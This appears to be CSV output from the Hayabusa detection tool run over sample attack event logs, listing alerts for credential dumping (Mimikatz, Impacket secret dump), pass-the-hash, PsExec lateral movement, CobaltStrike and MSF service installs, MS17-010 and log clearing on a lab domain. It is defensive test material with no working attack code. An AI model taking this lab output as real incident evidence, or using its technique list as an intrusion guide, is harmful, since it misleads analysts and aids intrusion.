2021-03-27 01:59:24.892 +09:00,rootdc1.offsec.lan,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4661-4658 Mimikatz sekurlsa password dump SAM.evtx
2021-04-21 05:32:55.368 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:32:55.368 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:00.305 +09:00,MSEDGEWIN10,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:00.384 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\user03 : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:01.944 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 18:27:51.181 +09:00,jump01.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-7036 PSexec service installation.evtx
2021-04-21 18:40:32.342 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.42.22 : Port: 56661 : LogonID: 0x1375fbd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: PSEXESVC.exe : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: PSEXESVC.exe : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.347 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.42.22 : Port: 56662 : LogonID: 0x1375fd8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.348 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.42.22 : Port: 56663 : LogonID: 0x1375ff5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.348 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.42.22 : Port: 56664 : LogonID: 0x1376003,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.360 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.42.22 : Port: 56666 : LogonID: 0x1376020,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.362 +09:00,srvdefender01.offsec.lan,4674,critical,SCM Database Privileged Operation,,rules/sigma/builtin/security/win_scm_database_privileged_operation.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.501 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.501 +09:00,srvdefender01.offsec.lan,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.510 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: cmd.exe : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.510 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: cmd.exe : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.528 +09:00,srvdefender01.offsec.lan,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.528 +09:00,srvdefender01.offsec.lan,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.529 +09:00,srvdefender01.offsec.lan,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 23:56:41.780 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-21 23:56:41.786 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\WindowsPowerShell\v1.0\powershell.exe : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID5145-remote service creation over SMB.evtx
2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\WindowsPowerShell\v1.0\powershell.exe : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\WindowsPowerShell\v1.0\powershell.exe : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5145-remote shell execution via SMB admin share.evtx
2021-04-21 23:56:41.897 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,CobaltStrike Service Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,CobaltStrike Service Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-MSF payload deployed via service.evtx
2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,CobaltStrike Service Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-MSF payload deployed via service.evtx
2021-04-22 17:50:53.614 +09:00,fs03vuln.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x74872,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: 0Konuy9q8HtkWeKS : IP Address: 10.23.123.11 : Port: 41747 : LogonID: 0x74872,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:04.780 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: FS03VULN$ : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:04.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: FS03VULN$ : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\WindowsPowerShell\v1.0\powershell.exe : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:04.796 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: FS03VULN$ : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:05.758 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x76e83,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:05.758 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 60163 : LogonID: 0x76e83,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:06.539 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x7777e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:06.554 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 60163 : LogonID: 0x7777e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:19.213 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:19.291 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:22.992 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\MS17_010_psexec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:22.994 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP\DESKTOP.INI : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:23.025 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\MS17_010_psexec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:23.025 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:23.042 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\MS17_010_psexec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:23.044 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:23.044 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\MS17_010_psexec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:23.060 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:23.171 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\MS17_010_psexec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 18:00:09.959 +09:00,fs03vuln.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
